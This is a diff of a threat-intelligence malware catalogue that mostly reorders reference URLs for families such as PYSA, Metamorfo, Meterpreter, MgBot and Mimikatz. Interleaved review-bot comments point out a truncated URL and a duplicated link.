@@ -33297,37 +34877,37 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.prodaft.com/m/reports/PYSA_TLPWHITE_3.0.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-burlap", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://twitter.com/inversecos/status/1456486725664993287", - "https://www.ic3.gov/Media/News/2021/210316.pdf", - "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html", - "https://www.lacework.com/blog/pysa-ransomware-gang-adds-linux-support/", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://twitter.com/campuscodi/status/1347223969984897026", - "https://blog.cyble.com/2021/11/29/pysa-ransomware-under-the-lens-a-deep-dive-analysis/", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/", - "https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat", - "https://www.bleepingcomputer.com/news/security/ransomware-gangs-script-shows-exactly-the-files-theyre-after/", - "https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", - 
"https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html", - "https://securelist.com/modern-ransomware-groups-ttps/106824/", "https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://securelist.com/modern-ransomware-groups-ttps/106824/", + "https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware", + "https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://twitter.com/inversecos/status/1456486725664993287", "https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.hhs.gov/sites/default/files/mespinoza-goldburlap-cyborgspider-analystnote-tlpwhite.pdf", - "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/" + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html", + "https://blog.cyble.com/2021/11/29/pysa-ransomware-under-the-lens-a-deep-dive-analysis/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + 
"https://www.ic3.gov/Media/News/2021/210316.pdf", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://twitter.com/campuscodi/status/1347223969984897026", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html", + "http://www.secureworks.com/research/threat-profiles/gold-burlap", + "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/ransomware-gangs-script-shows-exactly-the-files-theyre-after/", + "https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis", + "https://www.prodaft.com/m/reports/PYSA_TLPWHITE_3.0.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.lacework.com/blog/pysa-ransomware-gang-adds-linux-support/" ], "synonyms": [ "pysa" 
@@ -33357,15 +34937,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metaljack", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/", "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html", "https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks/", - "https://www.secrss.com/articles/17900", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.youtube.com/watch?v=ftjDH65kw6E", - "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/", + "https://s.tencent.com/research/report/944.html", "https://m.threatbook.cn/detail/2527", - "https://s.tencent.com/research/report/944.html" + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", + "https://www.secrss.com/articles/17900" ], "synonyms": [ "denesRAT" 
@@ -33376,21 +34956,22 @@ "value": "METALJACK" }, { - "description": "", + "description": "According to BitDefender, Metamorfo is a family of banker Trojans that has been active since mid-2018. It primarily targets Brazilians and is delivered mostly through Office files rigged with macros in spam attachments. Metamorfo is a potent piece of malware, whose primary capability is theft of banking information and other personal data from the user and exfiltration of it to the C2 server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo", - "https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", - "https://twitter.com/MsftSecIntel/status/1418706916922986504", - "https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf", - "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md", "https://blog.ensilo.com/metamorfo-avast-abuser", - "https://cofense.com/blog/autohotkey-banking-trojan/", - "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", - "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam", + "https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html", + "https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf", "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", - "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html" + "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", + 
"https://twitter.com/MsftSecIntel/status/1418706916922986504", + "https://cofense.com/blog/autohotkey-banking-trojan/", + "https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerou", + "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md", + "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors" ], "synonyms": [ "Casbaneiro" 
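Review bot: The newly added reference `"https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerou"` looks truncated (the path ends mid-word), so it is unlikely to resolve and will be published as a dead link in the Metamorfo/Casbaneiro entry. It is probably worth checking the upstream Malpedia record and correcting the URL to the full article path, or dropping the line until it can be verified. The other refs in this hunk are unchanged content that has only been reordered.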
@@ -33401,16 +34982,16 @@ "value": "Metamorfo" }, { - "description": "On March 7, 2022, KELA observed a threat actor named _META_ announcing the launch of META – a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.", + "description": "On March 7, 2022, KELA observed a threat actor named _META_ announcing the launch of META \u2013 a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer", - "https://isc.sans.edu/forums/diary/Windows+MetaStealer+Malware/28522/", + "https://medium.com/walmartglobaltech/metastealer-string-decryption-and-dga-overview-5f38f76830cd", + "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", "https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web", "https://ke-la.com/information-stealers-a-new-landscape/", - "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", "https://research.nccgroup.com/2022/05/20/metastealer-filling-the-racoon-void/", - "https://medium.com/walmartglobaltech/metastealer-string-decryption-and-dga-overview-5f38f76830cd" + "https://isc.sans.edu/forums/diary/Windows+MetaStealer+Malware/28522/" ], "synonyms": [], "type": [] 
@@ -33423,12 +35004,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.meteor", - "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/", - "https://twitter.com/_cpresearch_/status/1541753913732366338", + "https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/", "https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://twitter.com/_cpresearch_/status/1541753913732366338", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/" + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/" ], "synonyms": [], "type": [] 
@@ -33441,43 +35022,46 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter", - "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", - "https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea", - "http://schierlm.users.sourceforge.net/avevasion.html", "https://unit42.paloaltonetworks.com/atoms/obscureserpens/", - "https://asec.ahnlab.com/ko/26705/", - "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass", - "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", - "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", - "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", - "http://www.secureworks.com/research/threat-profiles/gold-franklin", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/", - "https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence", - "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", - "https://blog.morphisec.com/fin7-attacks-restaurant-industry", - "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", - "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "http://www.secureworks.com/research/threat-profiles/gold-winter", - "https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/", - 
"https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", - "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/", - "https://redcanary.com/blog/getsystem-offsec/", - "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/", - "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", - "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", - "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", - "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux", + "https://asec.ahnlab.com/en/53046/", "https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/", + "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/", + "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/", + "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", + "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", + "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", + "https://asec.ahnlab.com/ko/26705/", + "https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", "https://explore.group-ib.com/htct/hi-tech_crime_2018", + "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass", + 
"https://blog.morphisec.com/fin7-attacks-restaurant-industry", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "http://www.secureworks.com/research/threat-profiles/gold-winter", + "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/", - "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/" + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", + "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/", + "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", + "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", + "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/", + "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", + "http://schierlm.users.sourceforge.net/avevasion.html", + "https://redcanary.com/blog/getsystem-offsec/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", + "https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence", + "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx", + 
"https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea", + "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", + "http://www.secureworks.com/research/threat-profiles/gold-franklin" ], "synonyms": [], "type": [] @@ -33490,10 +35074,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mevade", - "https://www.youtube.com/watch?v=FttiysUZmDw", "https://blog.fox-it.com/2013/09/05/large-botnet-cause-of-recent-tor-network-overload/", - "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sefnit-trojan-just/" + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sefnit-trojan-just/", + "https://www.youtube.com/watch?v=FttiysUZmDw", + "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" ], "synonyms": [ "SBC", 
@@ -33521,12 +35105,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot", - "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", - "https://twitter.com/GossiTheDog/status/1438500100238577670", - "https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/", - "https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf", "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware", - "https://www.youtube.com/watch?v=LeKi0KfzOow&list=PLffioUnqXWkdzWcZXH-bzPVgcs2R4r7iS&index=1&t=2154s" + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/", + "https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/", + "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt-attacks-telecoms-africa-mgbot", + "https://twitter.com/GossiTheDog/status/1438500100238577670", + "https://www.youtube.com/watch?v=LeKi0KfzOow&list=PLffioUnqXWkdzWcZXH-bzPVgcs2R4r7iS&index=1&t=2154s", + "https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf" ], "synonyms": [ "BLame", 
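Review bot: The MgBot refs now contain the Malwarebytes article twice, once as `"https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware"` and once with a trailing slash; the update reorders them but does not collapse the pair. This is the same trailing-slash duplication seen elsewhere in the file, so a normalisation step in the generator would fix all occurrences at once rather than hand-editing each entry.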
@@ -33568,13 +35154,13 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor",
 "https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
- "https://github.com/cr4sh/microbackdoor",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://attackiq.com/2022/04/29/attack-graph-response-to-unc1151-continued-targeting-of-ukraine/",
 "https://cluster25.io/2022/03/08/ghostwriter-unc1151-adopts-microbackdoor-variants-in-cyber-operations-against-targets-in-ukraine/",
- "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
 "https://cert.gov.ua/article/37626",
+ "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
+ "https://github.com/cr4sh/microbackdoor",
+ "https://attackiq.com/2022/04/29/attack-graph-response-to-unc1151-continued-targeting-of-ukraine/",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
 "https://ti.qianxin.com/blog/articles/Analysis-of-attack-activities-of-suspected-aptorganization-unc1151-against-ukraine-and-other-countries/"
 ],
 "synonyms": [],
@@ -33588,20 +35174,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin",
- "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf",
- "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636",
- "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
- "https://securelist.com/microcin-is-here/97353/",
- "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/",
- "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia",
- "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/",
 "https://securelist.com/microcin-is-here/97353",
+ "https://github.com/dlegezo/common",
+ "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/",
+ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/",
+ "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia",
+ "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
+ "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/",
 "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf",
+ "https://securelist.com/microcin-is-here/97353/",
 "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
- "https://github.com/dlegezo/common"
+ "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636",
+ "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -33614,13 +35200,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia",
+ "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf",
 "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
- "https://blog.talosintelligence.com/2022/02/arid-viper-targets-palestine.html",
 "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/micropsia_apt_c_23.md",
- "http://blog.talosintelligence.com/2017/06/palestine-delphi.html",
 "https://research.checkpoint.com/apt-attack-middle-east-big-bang/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks",
- "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf"
+ "https://blog.talosintelligence.com/2022/02/arid-viper-targets-palestine.html",
+ "http://blog.talosintelligence.com/2017/06/palestine-delphi.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks"
 ],
 "synonyms": [],
 "type": []
@@ -33633,8 +35219,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.midas",
- "https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants",
 "https://news.sophos.com/en-us/2022/01/25/windows-services-lay-the-groundwork-for-a-midas-ransomware-attack/",
+ "https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants",
 "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/"
 ],
 "synonyms": [],
@@ -33661,8 +35247,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.milan",
- "https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/",
- "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf"
+ "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf",
+ "https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/"
 ],
 "synonyms": [],
 "type": []
@@ -33688,9 +35274,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
 "https://securelist.com/wildpressure-targets-macos/103072/",
- "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf"
+ "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/"
 ],
 "synonyms": [],
 "type": []
@@ -33729,138 +35315,141 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
- "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
- "https://www.crowdstrike.com/blog/overwatch-elite-call-escalation-vital-to-containing-attack/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks",
- "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations",
- "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
- "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/",
- "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
- "https://www.mandiant.com/resources/blog/alphv-ransomware-backup",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
- "https://blog.xpnsec.com/exploring-mimikatz-part-1/",
- "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
- "https://www.infinitumit.com.tr/apt-35/",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
- "https://www.ic3.gov/Media/News/2021/210823.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
- "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-152a",
- "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
- "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
- "https://www.ic3.gov/media/news/2020/200917-1.pdf",
